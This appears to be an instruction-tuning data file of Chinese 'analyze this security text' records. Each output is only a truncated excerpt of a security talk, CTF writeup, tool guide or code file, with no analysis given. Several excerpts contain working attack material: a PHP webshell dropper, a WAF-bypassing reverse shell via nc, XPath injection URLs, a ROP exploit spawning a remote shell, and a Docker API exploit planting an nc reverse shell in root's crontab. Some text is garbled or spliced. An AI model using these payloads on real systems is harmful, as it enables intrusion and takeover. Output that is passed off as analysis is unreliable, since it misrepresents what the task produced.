{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngarble 研究 目录 Go编译流程 garble 结果 编译输出 asm compile link 其他 garble的混淆 文本的混淆 总结 参考 Go编译流程 创建临时目录mkdir -p $WORK/b001/ 查找依赖信息cat >$WORK/b001/importcfg << ... 执行源代码编译/usr/local/go/pkg/tool/darwin_amd64/compile ... 收集链接库文件cat >$WORK/b001/importcfg.link << ... 生成可执行文件/usr/local/go/pkg/tool/darwin_amd64/link -o ... 移动可执行文件mv $WORK/b001/exe/a.out hello 参考 https://zhuanlan.zhihu.com/p/62922404 garble 结果 garble.exe --debug build -a ./testdata/bench/ C:\\Users\\xqx\\Downloads\\garble-0.6.0>garble.exe --debug build -a ./testdata/bench/ [garble] original build info obtained in 404.58ms via: go list -json -export - trimpath -deps ./testdata/bench/ [garble] calling via toolexec: C:\\Program Files\\Go\\bin\\go.exe build -trimpath - toolexec=C:\\Users\\xqx\\Downloads\\garble-0.6.0\\garble.exe -debug -a ./testdata/bench/ # internal/unsafeheader [garble] shared cache loaded in 1.01ms from C:\\Users\\xqx\\AppData\\Local\\Temp\\garble-shared2294351362\\main-cache.gob [garble] transforming compile with args: -o $WORK\\b005\\_pkg_.a -trimpath C:\\Program Files\\Go\\src\\internal\\unsafeheader=>internal/unsafeheader;C:\\Users\\xqx\\AppData\\L ocal\\ Temp\\go-build836191770\\b005=> -p internal/unsafeheader -std -complete -buildid 6Lk3G_89Pb2Kfju4e-Kd/6Lk3G_89Pb2Kfju4e-Kd -goversion go1.17.3 -importcfg $WORK\\b005\\import cfg -pack -c=4 C:\\Program Files\\Go\\src\\internal\\unsafeheader\\unsafeheader.go [garble] 0 cached output files loaded in 0s [garble] obfuscating unsafeheader.go [garble] transformed args for compile in 9.22ms: -o $WORK\\b005\\_pkg_.a -trimpath C:\\Users\\xqx\\AppData\\Local\\Temp\\garble-shared2294351362=>;C:\\Program Files\\Go\\src\\intern al\\unsafeheader=>internal/unsafeheader;C:\\Users\\xqx\\AppData\\Local\\Temp\\go- build836191770\\b005=> -p internal/unsafeheader -std -complete -buildid 6Lk3G_89Pb2Kfju4e-Kd/6Lk 3G_89Pb2Kfju4e-Kd -goversion go1.17.3 -importcfg C:\\Users\\xqx\\AppData\\Local\\Temp\\garble-shared2294351362\\importcfg3347418780 -pack -c=4 -dwarf=false C:\\Users\\xqx\\AppData \\Local\\Temp\\garble-shared2294351362\\internal\\unsafehea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTaking Kerberos To The Next Level James Forshaw | @tiraniddo  Researcher @ Google Project Zero  Specialize in Windows  Local Privilege Escalation  RPC/COM Internals  Token manipulation  NtApiDotNet | D2J | OleViewDotNet Never met a logical vulnerability I didnt like. Nick Landers | @monoxgas  Adversarial R&D @ NetSPI  Also specialize in Windows  Offensive tooling suites  Payload architectures  Vulnerability research  sRDI | Dark Side Ops Your Prod is our Dev. Assumptions You understand the basics of Kerberos Youre (somewhat) familiar with existing remote attacks You want to see some local privilege escalation (LPE) Talking to Yourself can be good for you Server Code ABC.REALM Client Code Local Kerberos Authentication Local Security Authority Kerberos Security Package AcceptSecurityContext KDC.REALM KEY: abc$@REALM SPN: HOST/ABC InitializeSecurityContext krbtgt/REALM TGT PAC Server Code ABC.REALM Client Code Local Kerberos Authentication Local Security Authority Kerberos Security Package KDC.REALM KEY: abc$@REALM InitializeSecurityContext TGS-REQ SPN: HOST/ABC krbtgt/REALM TGT PAC Server Code ABC.REALM Client Code Local Kerberos Authentication Local Security Authority Kerberos Security Package KDC.REALM SPN: HOST/ABC krbtgt/REALM TGT PAC InitializeSecurityContext TGS-REP HOST/ABC TGS PAC KEY: abc$@REALM Server Code ABC.REALM Client Code Local Kerberos Authentication Local Security Authority Kerberos Security Package KDC.REALM KEY: abc$@REALM SPN: HOST/ABC krbtgt/REALM TGT PAC AP-REQ HOST/ABC TGS PAC AcceptSecurityContext Local Security Authority Server Code ABC.REALM Client Code Local Kerberos Authentication Kerberos Security Package KDC.REALM KEY: abc$@REALM SPN: HOST/ABC krbtgt/REALM TGT PAC HOST/ABC TGS PAC Access Token KEY PAC ❶ Logon with credentials to initialize key in LSA User Session Local Security Authority Client Local Kerberos Silver Ticket KEY: bob@REALM LsaLogonUser u: REALM\\bob pw: Password! User Session Local Security Authority Client Local Kerberos Si", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level14 #### About This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it :) To do this level, log in as the level14 account with the password level14. Files for this level can be found in /home/flag14. #### Source code There is no source code available for this level #### Solutions ``` 11111111111111111111111111111111111111111111111 123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]` Output: 8457c118-887c-4e40-a5a6-33a25353165 su flag14 < 8457c118-887c-4e40-a5a6-33a25353165 /bin/getflag ``` #### Exploits ``` #!/usr/bin/env python # -*- encoding: utf-8 -*- def main(): with open('/home/flag14/token', 'r') as f: keys = [] data = f.read().strip() for i, j in enumerate(data): key = chr(ord(j) - i) keys.append(key) pwd = \"\".join(keys) return pwd if __name__ == \"__main__\": main() ``` #### Recommends How to run command as a different user ? http://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/ http://stackoverflow.com/questions/233217/pass-password-to-su-sudo-ssh http://www.experts-exchange.com/Programming/Languages/Scripting/Python/Q_23048208.html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStamp Out Hash Corruption, Crack All the Things! RyanReynolds,Manager,CroweHorwath,LLP JonathanClaudius,SpiderLabsSecurityResearcher,Trustwave July2012 Abstract ThiswhitepaperistoserveasasupportingreferencetotheDEFCON20talk,Stamp OutHashCorruption,CrackAlltheThings!.Thefocusofboththepaperand presentationistoshowhowanumberofWindowspasswordextractiontools CainandAble,Metasploit,Creddumpandmanyothersyieldcorruptdatawhen extractingpasswordhashesfromtheWindowsRegistry.Boththepaperandthe presentationincludethediscoveryprocessandadetaileddescriptionofthe problem,aswellasasolutionforobtainingthecorrecthashes. Content Primer ThemotivationbehindobtainingpasswordhashesfromWindowsbasedsystemsis verysimilartoobtainingpasswordhashesfromanyotheroperatingsystem,service orapplication.Generallyspeaking,thefocusofthisprocessiseithertotransforma hashintotheoriginalcleartextversionofthepasswordortobeabletousethat hashdirectly(perhapsviathepassthehashtechniqueinWindows)toeither validatethesecurityofthepassworditselfortoescalateprivilegesinthecontextof amalicioususer. WhenreferringtoWindowsbasedpasswordhashes,therearetwodifferenthash typesthatthispaperwillfocuson;LANManager(LM)stylehashesandNTLAN Manager(NTLM)stylehashes.LMhashingistheolderofthetwohashing algorithmsandcomeswithanumberofsecurityflaws:  Passwordsarenotcasesensitive  Passwordshaveamaximumlengthof14characters  Passwordsaresplitintotwo7characterportions,eachofwhichishashed separately,drasticallyreducingthenumberofpotentialhashkeys  Hashesarenotindividuallysalted NTLMhashing,beingthenewerofthetwoalgorithms,isstrongerthanLMhashing. Iteliminatesthefirstthreeshortcomings,butitisstillnotindividuallysalted, leavingbothalgorithmssusceptibletoprecomputeddictionaryattacks. Twomethodsforextractingpasswordhasheswillbediscussed:memoryinjection intotheLSASSprocessspace(memoryinjection)andreadingoftheSAMfromthe WindowsRegistry(registryreading). LSASSinjectionislikelythemostpopularmethodforobtainingWindowspassword hashes,usingtoolssuchaspwdu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVDLDS  ALL YOUR VOICE ARE BELONG TO US Ganesh Devarajan & Don LeBert Agenda  Introduction  Problem  Background  Scenarios  Architecture  Server Model  Distributed Client server model  Demo  Future Work Introduction  Ganesh Devarajan  Don LeBert Problem  People give out a lot of information on the phone calls  PII Data  Account information  Insider information Background  Government has the ability to tap Phone conversations and look for key words  Jihad, terrorist, etc.  This is done at the provider level or with an expensive bug Background  What is DLP?  Why is it important? Background  In the News  Sony PS3 Hack  RSA  Citi Bank Hack  ADP Background  What is VoIP?  How does a VoIP phone call work?  SIP, RTP Scenarios  Social Engineering  Insider Trading/Leaks  Calls to bookies/Brokers  Call centers  Vendor Account information  Spy on People?  PII Data  Credit Cards Architecture Architecture Architecture  VoIP data to Audio file  WireShark  VoIPong  VOMIT  Oreka  RTPBreak  RTPscan, RTPdump, RTPplay  Cain & Abel Architecture Architecture  Audio to Text Converter  Microsoft Speech (Now called Tellme)  Sphinx (3/4)  OSX (use NSSpeechRecognizer Class)  Other Commercial Architecture  Sphinx 4 Architecture  Speech recognition system written in java  Portable (mobile, osx, linux, windows)  Interaction with engine via scripting languages  Easy to hide ;) Architecture  Keyword Detection Engine  Script based  Completely custom in what you are trying to pull out  Takes some skill  Rule based  Easy for Joe sixpack  Low customization Deployment Architecture Deployment Architecture Deployment Architecture Demo Future Work  Extension for Mobile devices  Disguised App  Conversation sniffer  Real time Voice Obfuscator  Interact with conversation  Filter  Inject References  http://cmusphinx.sourceforge.net/wiki/ tutorialconcepts  http://cmusphinx.sourceforge.net/sphinx4/ Questions?  Ganesh Devarajan  ganesh.devarajan@gmail.com  Don LeBert  don.lebert@gmail.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPENTEST ETO(200) 学到了姿势盲注还可以这么搞= =测试了几发发现是 xpath 的注入 然后爆破不出来根据提示说要利用可见字符于是学到新技能 就是利用 测试 http://eto.sctf.xctf.org.cn/?action=user&id =6 or count(//user)=5(确认user节点存在) http://eto.sctf.xctf.org.cn/?action=user&id=6 or count(//user/password)=5(确认password字段 存在) http://eto.sctf.xctf.org.cn/?action=user&id=6 or string-length(//user[1]/password)=32确认 YeWenjie的密码是32位 存在的字符去盲注出密码一发脚本得到最后密码其中有一位注不出来猜了几个就猜 出是 m 来了= = Homework(200) 随手注册一发是发现可以利用php://filter/read=convert.base64-encode/resource=去读 到源码看一下注册的源码看到了是用 imagecreatefromgif 等函数处理上传图片的于是 想起了 http://www.freebuf.com/articles/web/54086.html然后就是改图片上传去包含就行 了 直接执行任意命令拿到最后 flag Sycshell(200) 依旧是先看源码一开始对着 index 上的东西看了好久在源码里发现内部资料 本地添加 host 去访问发现是张猫看源码发现大量 jsfuck找工具进行解密 发现目录访问之 用%0b.1e1 可以绕过 pass 然后继续发现能文件包含读了下 waf 可以发现把 phar 以及 zip 禁了然而大写绕过就可以了下面问题来了如何去 getshell 又学到了东西利用 LFI 以及 phpinfo 去写缓存文件 参考文章http://www.freebuf.com/articles/web/79830.html然后改了发脚本因为这里可 以用 ZIP 去绕过并读取文件打包一个 zip 然后去读取不断上传最终拿到 shell <?php $c=fopen(\"/tmp/hhh.php\",'w'); fwrite($c,'<?php eval($_POST[f]);?>'); ?> DrugMarket1(300) 首先在 404 源码里面发现真正的网址http://drug.spentest.com/访问一发主页貌似 没有很大用处看下源码: 发现存在一个类似于留言评论的输入框一开始想的是 xss结果随手试了试文件包含= = 然后发现居然可以读 session 的临时文件测试了下发现是直接把 name 写进 session 去 然后直接姓名写入一句话直接成功拿到 shell 然而发现上去权限做的好死尴尬了又想是渗透题现在这个的 shell 不是我们最终想要 的那个 shell于是翻到配置文件发现数据库的用户名和密码都是套路很容易猜对了 然后登入 drug 的数据库利用 upadte 去 xss 打到 drug 的后台以及 cookie 然后登陆到后台 目测是要执行命令然后主办方说要绕 waf然后绕啊绕发现空格也不行但能用{IFS}去 绕过同时 nc 监听的端口只能是 80于是思路就明确了 最终 payload 以及 flag 一台80端口 没被占用的 vpsnc监听 利用一台 web服务的 vps去wegt 绕过waf拿到 Reverse shell 然后在自己的 vps 上连接就好了 Hackme(300) 写在题目前面的话这个题目真心不只值 300 分 拿到题目发现存在注入点但是问题在于空格被过滤了使用/*111*/绕过可以读 取文件尝试读取 nginx 的错误日志找到后台然后尝试读取 php 文件权限不够下午得 到提示 xss 和管理员会查看备忘录想到写 xss 到数据库中发现确实可以 x 到数据但是没 用结合提示想到利用 xss 去读取浏览器缓存方法无非就是伪造登录框hook 登录按 钮偷窃浏览器的已保存密码之类的在比赛中因为不可能有人手动输入所以最后可能 的就是利用浏览器保存的密码于是发送一个表单过去让他自动填上 username 和 password之后 get 回本地得到密码 nizhendeyongyuancaibudaomimade这是对我们赤 裸裸的嘲讽登陆发现是文件下载之后尝试下载本目录下所有文件发现../ ..\\被过滤 了但是只过滤了一次使用/./绕过下载其他的文件源码见附件发现一个 session.php里头源码是 freebuf 的 http://www.freebuf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup HackIT 2017 Team: c7f.m0d3, nazywam, akrasuski1, shalom, ppr ![](score.png) ### Table of contents * [B3tterS0ci4lN3twork (web)](web50) * [V1rus3pidem1c (web)](web100) * [Weekands of hacker (web)](web150) * [Todays moon phase (pwn)](pwn150) * [4_messages (crypto)](crypto100) * [Evas chance (crypto)](crypto150) * [Chinese Satellite (crypto)](crypto200)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfindfs === 标签或UUID查找文件系统 ## 补充说明 **findfs命令** 依据卷标Label和UUID查找文件系统所对应的设备文件findfs命令会搜索整个磁盘看是否有匹配的标签或者UUID没有如果有则打印到标注输出上findfs命令也是e2fsprogs项目的一部分 ### 语法 ```shell findfs(参数) ``` ### 参数 `LABEL=<卷标>`或者`UUID=<UUID>`按照卷标或者UUID查询文件系统 ### 实例 通过卷标名查找对应的文件系统 ```shell findfs LABEL=/boot /dev/hda1 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n通用型漏洞的应急响应 主讲人 钟武强 腾讯安全应急响应中心TSRC负责人 关于我  钟武强小五微信号Mark4z5  腾讯安全应急响应中心TSRC负责人  广东省信息安全测评中心 > 百度 > 腾讯  十多年安全经验擅长应急响应渗透测试 关于腾讯  中国最大互联网公司全球市值排名第五  产品众多形态多样化  超十亿用户超百万台服务器 安全风险分类 账号风险 欺诈风险 etc.. 漏洞攻击风险 DDOS攻击风险 etc.. 办公网攻击风险 员工违规风险 etc.. 业务安全 应用运维安全 内部安全 漏洞Case 1回顾 2014年 OpenSSL Heartbleed心脏出血漏洞 远程读取服务器内存数据 发送https恶意请求就能窃取到其他用户cookie凭证 各大互联网公司受影响 修复方案升级OpenSSL并重启WebServer等服务 国内某漏洞平台收到的报告 漏洞Case 2回顾 2016年 ImageMagick远程代码执行漏洞 上传一张图片就能入侵服务器 各大互联网公司受影响 国内某漏洞平台收到的报告 国外某互联网巨头公司被爆漏洞 漏洞Case 3回顾 2018年 Intel CPU信息泄漏漏洞 几乎全部Intel CPU受影响 修复方案打微码补丁操作系统补丁 重启系统性能下降还可能蓝屏 Windows补丁修出1个本地提权漏洞 0rz 所以 通用型漏洞 往往影响范围广修复难度大处理非常棘手 腾讯是如何开展通用型漏洞的应急响应 应急响应流程 漏洞获悉 漏洞评估 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 复盘总结 价值输出 第一阶段 第二阶段 第三阶段 漏洞获悉 漏洞评估 没弄到情报 情报来晚了被搞了 好多情报看不过来  情报自动化采集  200个软件源100个资讯类源400个twitter微博源  平均每15分钟采集一轮日均采集1000条  过滤后日均推送告警80条紧急情报重点提醒  漏洞奖励计划  0day 或 最新公开漏洞情报  自主挖掘发现  其他渠道  官方保密性漏洞通知如Intel  私人圈子交流 漏洞获悉 漏洞评估 评估速度慢 评估误判  评估要点  确认漏洞原因危害影响范围PoC和修复方案  评估效率及准确性  关键是人才安全技术及经验的积累  TSRC作为应急指挥中心统一协调确保各项应急工作有序快速开展  第一时间通知安全兄弟团队公司领导业务同事告知风险及后续工作 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 如何全面发现 存在漏洞的业务  主机安全系统本地采集受影响主机  本地执行find/ps/grep/strings/ldd/特定二进制等命令  漏洞扫描器对全业务Web/APP进行检测  人工排查重点业务优先保证重点业务安全  引导业务同事进行自查  白帽子帮忙发现漏网之鱼 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 修复优先级 修复闭环 漏洞咨询量暴增  邮件/微信/工单等方式通知业务修复  给出修复方案和限期外网优先修复  使用工单系统进行闭环避免跟丢  持续确认和周知修复情况  漏洞FAQ文章减少沟通成本 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 修复期间遭攻击  网络入侵检测系统4/7层异常流量  主机入侵检测系统webshell命令执行等 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 修复期间遭攻击  Web应用防火墙WAF拦截恶意请求  主机入侵检测系统具备快速止损能力  一检测到攻击成功立刻断网 漏洞知会 漏洞发现 漏洞修复 攻击检测 攻击拦截 复盘总结 价值输出  按时间线整理应急过程肯定成绩暴露缺陷  举一反三提升安全能力避免长期疲于救火 复盘总结 价值输出  发表内部文章宣传安全价值赢取业务持续配合安全工作  发表外部文章分享安全技术为互联网安全贡献力量 腾讯TEG安全平台部  漏洞扫描  入侵检测  态势感知  WAF拦截  DDOS防御  业务安全  安全大数据  应急响应  红蓝对抗  安全评估  安全预研  AI安全  etc.. 负责全公司安全问题每天枪林弹雨挑战巨大 有挑战才有进步欢迎加入我们 https://security.tencent.com security@tencent.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Android安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **案例** - [Attacking the attackers Hacking like it's 1999](https://asaf.me/2018/07/23/attacking-the-attackers/) - [如何攻击智能汽车远程启动系统Part 1](https://www.anquanke.com/post/id/153373) - [对恶意Android应用Bangle Android App Packer的分析](http://www.freebuf.com/vuls/178919.html) - [怀揣情怀的提醒及时修复(某智能门锁二度分析感悟)](https://paper.seebug.org/343/) - [[Onls丶辜釉]无码分享渗透某社交APP](https://bbs.ichunqiu.com/thread-27421-1-22.html) - [技术讨论 | 看我如何破解一台自动售货机 ](https://www.freebuf.com/articles/terminal/186804.html) - [一个色播APP逆向初窥千万灰色直播产业](https://evilpan.com/2019/01/05/reverse-live-porn-app/) - [Telegram App Store Secret-Chat Messages in Text Database](https://blog.zimperium.com/telegram-hack/) - [对某某加速器逆向抓包破解提取线路分析](https://www.52pojie.cn/thread-1175677-1-1.html) - [APP硬编码密钥渗透测试](https://www.t00ls.net/articles-58594.html) - dexdump 脱壳,AES,OSS 利用 - [BountyHunterInChina/重生之我是赏金猎人(二)-逆向app破解数据包sign值实现任意数据重放添加.pdf](https://github.com/J0o1ey/BountyHunterInChina/blob/main/%E9%87%8D%E7%94%9F%E4%B9%8B%E6%88%91%E6%98%AF%E8%B5%8F%E9%87%91%E7%8C%8E%E4%BA%BA(%E4%BA%8C)-%E9%80%86%E5%90%91app%E7%A0%B4%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%8C%85sign%E5%80%BC%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E6%95%B0%E6%8D%AE%E9%87%8D%E6%94%BE%E6%B7%BB%E5%8A%A0.pdf) - [对小绵羊的轰炸APP逆向分析](https://mp.weixin.qq.com/s/fUCGRL-25vLoAPXUd4ZiWw) **CTF writeup** - [BUUCTF Reverse hellowordfindit](https://blog.csdn.net/qq_42967398/article/details/96877555) --- ## 抓包方法 **相关文章** - [太干了Android 抓包姿势总结](https://mp.weixin.qq.com/s/EB0MAJQs1CIEUHezmTFxtg) - [Android Pentesting Setup On Macbook M1](https://infosecwriteups.com/android-pentesting-setup-on-macbook-m1-d2f1f0a8db4b) **mac + Android studio 抓包** ```bash cd cd Library/Android/sdk/emulator ./emulator -list-avds ./emulator -avd test -writable-system # 导出 burp 的证书 cacert.der openssl x509 -inform DER -in cacert.der -out cacert.pem openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1 mv cacert.pem 9a5ba575.0 cd cd L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMan-In-The-Disk Slava Makkaveev DEF CON 2018 Me  Slava Makkaveev  Security Researcher  Check Point Software Technologies Ltd.  PhD in Computer Science  Reverse engineering and vulnerability research Android Application Security Basics Apps Sandbox Model Application UID 10045 untrusted_app Android Framework Storage Android OS App UID 10046 Network Apps Permissions Normal/ Dangerous Preinstalled/ Privileged  SMS  CONTACTS  STORAGE  ...  WRITE_SETTINGS  INSTALL_PACKAGES  ... ROM Signature/ SharedUserId  ACCOUNT_MANAGER  OEM_UNLOCK_STATE  ... What about Applications Storage? Apps Storage Internal  Built-in non-volatile memory  Always available  Private External  Partition in permanent memory  Public Removable  Not always available  World-readable Why use External Storage?  Share media files between apps  Transfer files between smartphone and PC  Compatibility with limited inner storage devices  Hide the current size of the application External Storage Protection  Global storage access  READ_EXTERNAL_STORAGE permission  WRITE_EXTERNAL_STORAGE permission  Private directory per application  Files are not accessible by MediaStore content provider  Observing prevention Man-In-The-Disk Attack External Storage Usage Scenario Downloading to external storage Maintaining working data on external storage MITD Attack Vectors Downloading to external storage Maintaining working data on external storage External Storage Observing FileObserver observer; observer = new FileObserver( \"/storage/emulated/0/path/to/folder\") { @Override public void onEvent(int event, String file) { // ... } }; observer.startWatching(); int length, i = 0; int fd, wd; char buffer[EVENT_BUF_LEN]; fd = inotify_init(); wd = inotify_add_watch(fd, \"/tmp\", IN_CREATE); length = read(fd, buffer, EVENT_BUF_LEN); while (i < length) { struct inotify_event *event = (struct inotify_event *) &buffer[i]; // ... i += EVENT_SIZE + event->len; } inotify_rm_watch(fd, wd); close(fd); Java Native Private Directory Observing File w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Suricata <p align=\"center\"> <img src=\"../../../assets/img/logo/Suricata.png\" width=\"22%\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **官网** - https://suricata-ids.org/ **项目地址** - https://github.com/OISF/suricata **简介** Suricata 是由 OISF开发信息安全基金会开发它也是基于签名但是集成了创新的技术该引擎嵌入了一个 HTTP 规范化器和分析器HTP 库可提供非常先进的 HTTP 流处理从而能够在 OSI 模型的第七层应用层上解析流量 Suircata 是一款支持 IDS 和 IPS 的多线程入侵检测系统与传统 Snort 相比Suircata 的多线程和模块化设计上使其在效率和性能上超过了原有 Snort它将 CPU 密集型的深度包检测工作并行地分配给多个并发任务来完成这样的并行检测可以充分利用多核硬件的优势来提升入侵检测系统的吞吐量在数据包的深度检测上效果优越并且 Suircata 可以兼容现有的 Snort 规则签名还增加了对 ipv6 的支持已经逐渐成为传统 Snort 入侵检测系统的代替方案 **相关文章** - [Suricata工控规则研究](https://www.freebuf.com/articles/ics-articles/237420.html) - [Suricata IDS 入门  规则详解](https://www.secpulse.com/archives/71603.html) - [使用Suricata和ELK进行流量检测](https://zhuanlan.zhihu.com/p/64742715) - [Suricata规则介绍以及使用suricata-update做规则管理](https://zhuanlan.zhihu.com/p/36340468) - [suricata下的挖矿行为检测](https://www.freebuf.com/articles/network/195171.html) - [Suricata + Lua实现本地情报对接](https://www.freebuf.com/sectool/218951.html) **架构** Suricata 有三种运行模式分别为 singleworkersautofp官方推荐性能最佳的运行模式为 workers 模式 - single 模式只有一个包处理线程一般在开发模式下使用 - workers 模式多个包处理线程每个线程包含完整的处理逻辑 - autofp 模式有多个包捕获线程多个包处理线程一般适用于 nfqueue 场景从多个 queue 中消费流量来处理 报文检测系统通常包含四大部分报文获取报文解码报文检测日志记录Suricata 不同的功能安装模块划分一个模块的输出是另一个模块的输入 --- ## 安装部署 **Ubuntu 下安装** ```bash add-apt-repository ppa:oisf/suricata-stable apt update apt install -y suricata jq apt install -y suricata-update ``` ### 基础使用 ```bash suricata-update # 更新规则 suricata -T # 测试运行 suricata -i ens33 -c /etc/suricata/suricata.yaml -vvv # 启动运行 # 注: 这里 -vvv 参数建议加上. 如果你的Lua脚本有一些问题, 如果加上了这个参数, 就可以通过 suricata.log 日志看出 suricata -r <path> -c /etc/suricata/suricata.yaml -vvv # 在PCAP脱机模式重放模式下运行从PCAP文件读取文件如果<path>指定了一个目录则该目录中的所有文件将按修改时间的顺序进行处理以保持文件之间的流状态 ``` ### 配置文件 `/etc/suricata/` 目录下有 4 个配置文件和一个文件夹, 作用分别是: - classification.config : 定义了各种流量攻击类型和优先级类似拒绝服务攻击和 web 应用攻击等 - reference.config : 记录一些安全网站漏洞平台的网址或者是自己可以自定义的 url是参考的意思用来联系外部的恶意攻击检测网站中关于此类攻击的页面 - su", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/* * Copyright 2015-2016 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the \"License\"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an \"AS IS\" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package example.springdata.rest.headers; import example.springdata.rest.headers.Customer.Gender; import javax.annotation.PostConstruct; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.data.jpa.repository.config.EnableJpaAuditing; /** * @author Oliver Gierke * @soundtrack The Intersphere - Out of phase (Live at Alte Feuerwache Mannheim) */ @EnableJpaAuditing @SpringBootApplication public class Application { public static void main(String... args) { SpringApplication.run(Application.class, args); } @Autowired CustomerRepository customers; public @PostConstruct void init() { customers.save(new Customer(\"Dave\", \"Matthews\", Gender.MALE, // new Address(\"4711 Some Place\", \"54321\", \"Charlottesville\", \"VA\"))); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n5space WrtieUp By Nu1L 5space WrtieUp By Nu1L Pwn H3llOR0P Crypto 5_vgcd Reverse 5_crackme crackme_2 Web 5_web_BaliYun 5_web_Eeeeasy_SQL eazylogin 5_web_letmeguess_1 Database cloudsql_reveage Misc sakan sakana_revenge 5_Misc_m@sTeR_0f Pwn H3llOR0P from pwn import * # p = process('./H3ll0Rop') p = remote('123.56.175.221', '14454') elf = ELF('./H3ll0Rop') libc = ELF('./libc-2.23.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] vuln = elf.sym['vuln'] pop_rdi = 0x0000000000400753 payload = b'a'*104 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln) p.recvuntil(b'me???\\n\\n') p.sendline(payload) p.recvuntil(b'pwn it\\n\\n') puts_real = u64(p.recvline()[:-1].ljust(8,b'\\x00')) libc.address = puts_real - libc.sym['puts'] # p.interactive() Crypto 5_vgcd Reverse system = libc.sym['system'] binsh = next(libc.search('/bin/sh\\x00'.encode())) payload = b'a'*104 + p64(pop_rdi) + p64(binsh) + p64(system) + p64(0xdeadbeef) p.sendline(payload) p.interactive() from Crypto.Util.number import * from random import getrandbits, seed from gmpy2 import mpz import gmpy2 from tqdm import tqdm from multiprocessing import Pool from sage.all import * with open('/mnt/f/ctf/5space2022/3074f5e0c/output3.txt', 'r') as f: n = eval(f.readline().strip()) c = eval(f.readline().strip()) xs_ = eval(f.readline().strip()) xs_ += eval(f.readline().strip()) xs_ += eval(f.readline().strip()) xs_ += eval(f.readline().strip()) xs_ += eval(f.readline().strip()) for i in range(len(xs_)): for j in range(i+1, len(xs_)): x1 = xs_[i][0] - xs_[j][0] x2 = xs_[i][1] - xs_[j][1] phigh = int(gcd(x1, x2)) if phigh.bit_length() > 200 and isPrime(phigh): P.<x> = PolynomialRing(Zmod(n)) kbits = 512 - 288 phigh = phigh << kbits h = phigh + x roots = h.small_roots(2kbits, beta=0.4, epsilon=1/32) if roots: p = int(h(roots[0])) assert n % p == 0 q = n // p d = inverse_mod(65537, (p-1)*(q-1)) m = pow(c, d, n) print(long_to_bytes(int(m))) exit() Reverse 5_crackme VERSION=\"OpenHarmony 1.0 提取rootfs.img /etc/init.cfg中可以看", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Docker daemon api unauthorized access exploit [中文版本(Chinese version)](README.zh-cn.md) Reference Links - http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8 ## Vulnerability environment Enter the following command to build and run the vulnerability environment: ``` docker compose build docker compose up -d ``` ## Exploit Start a container, and mount the host `/etc` folder to the container, then we will have read/write access to any files. We can put the commands in crontab configuration file to reverse shell ```python import docker client = docker.DockerClient(base_url='http://your-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c \"echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root\" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}}) ``` Reverse shell exploit by injecting commands in crontab: ![](1.png)", "category": "text_analysis", "source": "security_papers"}
